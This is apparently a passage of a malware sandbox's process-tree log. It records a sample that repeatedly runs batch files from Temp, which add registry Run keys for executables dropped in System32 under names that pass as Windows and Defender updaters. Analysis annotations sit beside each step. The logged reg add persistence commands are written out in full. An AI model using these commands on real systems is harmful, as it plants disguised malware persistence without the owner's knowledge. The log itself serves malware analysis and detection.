C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"67⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"67⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DC7.tmp\7DC8.tmp\7DC9.bat C:\Windows\system32\java.exe"68⤵
-
C:\Windows\system32\timeout.exetimeout 169⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f69⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f69⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f69⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f69⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"69⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"70⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"69⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"69⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8640.tmp\8641.tmp\8642.bat C:\Windows\system32\java.exe"70⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 171⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f71⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f71⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f71⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f71⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"71⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"72⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"71⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"71⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D9F.tmp\8DA0.tmp\8DA1.bat C:\Windows\system32\java.exe"72⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 173⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f73⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f73⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f73⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f73⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"73⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"74⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"73⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"73⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9721.tmp\9722.tmp\9723.bat C:\Windows\system32\java.exe"74⤵
-
C:\Windows\system32\timeout.exetimeout 175⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f75⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f75⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f75⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f75⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"75⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"76⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"75⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"75⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EA0.tmp\9EA1.tmp\9EA2.bat C:\Windows\system32\java.exe"76⤵
-
C:\Windows\system32\timeout.exetimeout 177⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f77⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f77⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f77⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f77⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"77⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"78⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"77⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"77⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A525.tmp\A526.tmp\A527.bat C:\Windows\system32\java.exe"78⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 179⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f79⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f79⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f79⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f79⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"79⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"80⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"79⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"79⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A8DD.tmp\A8DE.tmp\A8DF.bat C:\Windows\system32\java.exe"80⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 181⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f81⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f81⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f81⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f81⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"81⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"82⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"81⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"81⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD11.tmp\AD12.tmp\AD13.bat C:\Windows\system32\java.exe"82⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 183⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f83⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f83⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f83⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f83⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"83⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"84⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"83⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"83⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B155.tmp\B156.tmp\B157.bat C:\Windows\system32\java.exe"84⤵
-
C:\Windows\system32\timeout.exetimeout 185⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f85⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f85⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f85⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f85⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"85⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"86⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"85⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"85⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B56A.tmp\B56B.tmp\B56C.bat C:\Windows\system32\java.exe"86⤵
-
C:\Windows\system32\timeout.exetimeout 187⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f87⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f87⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f87⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f87⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"87⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"88⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"87⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"87⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BBE0.tmp\BBE1.tmp\BBE2.bat C:\Windows\system32\java.exe"88⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 189⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f89⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f89⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f89⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f89⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"89⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"90⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"89⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"89⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0EF.tmp\C0F0.tmp\C0F1.bat C:\Windows\system32\java.exe"90⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 191⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f91⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f91⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f91⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f91⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"91⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"92⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"91⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"91⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C7C2.tmp\C7C3.tmp\C7C4.bat C:\Windows\system32\java.exe"92⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 193⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f93⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f93⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f93⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f93⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"93⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"94⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"93⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"93⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D02B.tmp\D02C.tmp\D02D.bat C:\Windows\system32\java.exe"94⤵
-
C:\Windows\system32\timeout.exetimeout 195⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f95⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f95⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f95⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f95⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"95⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"96⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"95⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"95⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D78A.tmp\D78B.tmp\D78C.bat C:\Windows\system32\java.exe"96⤵
-
C:\Windows\system32\timeout.exetimeout 197⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f97⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f97⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f97⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f97⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"97⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"98⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"97⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"97⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DFC4.tmp\DFC5.tmp\DFC6.bat C:\Windows\system32\java.exe"98⤵
-
C:\Windows\system32\timeout.exetimeout 199⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f99⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f99⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f99⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f99⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"99⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"100⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"99⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"99⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E782.tmp\E783.tmp\E784.bat C:\Windows\system32\java.exe"100⤵
-
C:\Windows\system32\timeout.exetimeout 1101⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f101⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f101⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f101⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f101⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"101⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"102⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"101⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"101⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEC2.tmp\EEC3.tmp\EEC4.bat C:\Windows\system32\java.exe"102⤵
-
C:\Windows\system32\timeout.exetimeout 1103⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f103⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f103⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f103⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f103⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"103⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"104⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"103⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"103⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F75A.tmp\F75B.tmp\F75C.bat C:\Windows\system32\java.exe"104⤵
-
C:\Windows\system32\timeout.exetimeout 1105⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f105⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f105⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f105⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f105⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"105⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"106⤵
-
-
-
